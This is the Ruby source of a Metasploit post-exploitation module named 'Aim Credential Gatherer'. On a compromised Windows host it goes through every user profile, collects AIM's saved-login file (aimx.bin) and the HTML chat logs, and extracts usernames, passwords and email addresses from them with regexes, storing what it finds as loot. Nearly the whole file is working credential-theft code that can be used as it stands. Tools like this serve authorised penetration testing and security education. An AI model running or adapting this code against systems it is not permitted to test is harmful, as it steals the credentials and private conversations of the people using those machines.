Path: blob/master/modules/post/windows/gather/credentials/aim.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Declarative description of what the Packrat sweep should look for.
  #
  # Every gatherable artifact lives under the user's LocalAppData\AIM
  # directory; each entry names the file(s) to collect and the regexes used to
  # pull credentials and TO/FROM e-mail addresses out of their contents.
  # The :filetypes values double as the choices offered by the ARTIFACTS
  # option (see #initialize).
  #
  # NOTE: `freeze` is shallow here -- the nested hashes and arrays remain
  # mutable, so treat this structure as read-only by convention.
  ARTIFACTS = {
    application: 'AIM',
    app_category: 'chats',
    gatherable_artifacts: [
      {
        filetypes: 'logins',
        path: 'LocalAppData',
        dir: 'AIM',
        artifact_file_name: 'aimx.bin',
        description: "AIM's saved Username and Passwords",
        credential_type: 'text',
        regex_search: [
          {
            extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
            extraction_type: 'credentials',
            regex: [
              '(?i-mx:password.*)',
              '(?i-mx:username.*)'
            ]
          },
          {
            extraction_description: 'searches for Email TO/FROM address',
            extraction_type: 'Email addresses',
            regex: [
              '(?i-mx:to:.*)',
              '(?i-mx:from:.*)'
            ]
          }
        ]
      },
      {
        filetypes: 'chat_logs',
        path: 'LocalAppData',
        dir: 'AIM',
        artifact_file_name: '*.html',
        description: "AIM's chat logs with date and times",
        credential_type: 'text',
        regex_search: [
          {
            extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
            extraction_type: 'credentials',
            regex: [
              '(?i-mx:password.*)',
              '(?i-mx:username.*)'
            ]
          },
          {
            extraction_description: 'searches for Email TO/FROM address',
            extraction_type: 'Email addresses',
            regex: [
              '(?i-mx:to:.*)',
              '(?i-mx:from:.*)'
            ]
          }
        ]
      }
    ]
  }.freeze

  # Registers module metadata and the options that steer the sweep.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Aim Credential Gatherer',
        'Description' => %q{
          This module searches for Aim credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # The ARTIFACTS option enumerates the distinct :filetypes declared above,
    # with 'All' prepended as the default so the sweep covers every artifact.
    artifact_choices = ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }.uniq

    register_options(
      [
        # Default only matches lines that begin with "password".
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ['All', *artifact_choices]])
      ]
    )
  end

  # Module entry point: echoes the selected options, then runs the Packrat
  # sweep once per user profile found on the host.
  #
  # REGEX, STORE_LOOT and EXTRACT_DATA are only printed here; they are
  # presumably read from the datastore inside run_packrat (Packrat mixin) --
  # confirm there if changing option names.
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One sweep per profile so artifacts belonging to every account are collected.
    grab_user_profiles.each { |profile| run_packrat(profile, ARTIFACTS) }

    print_status('PackRat credential sweep completed')
  end
end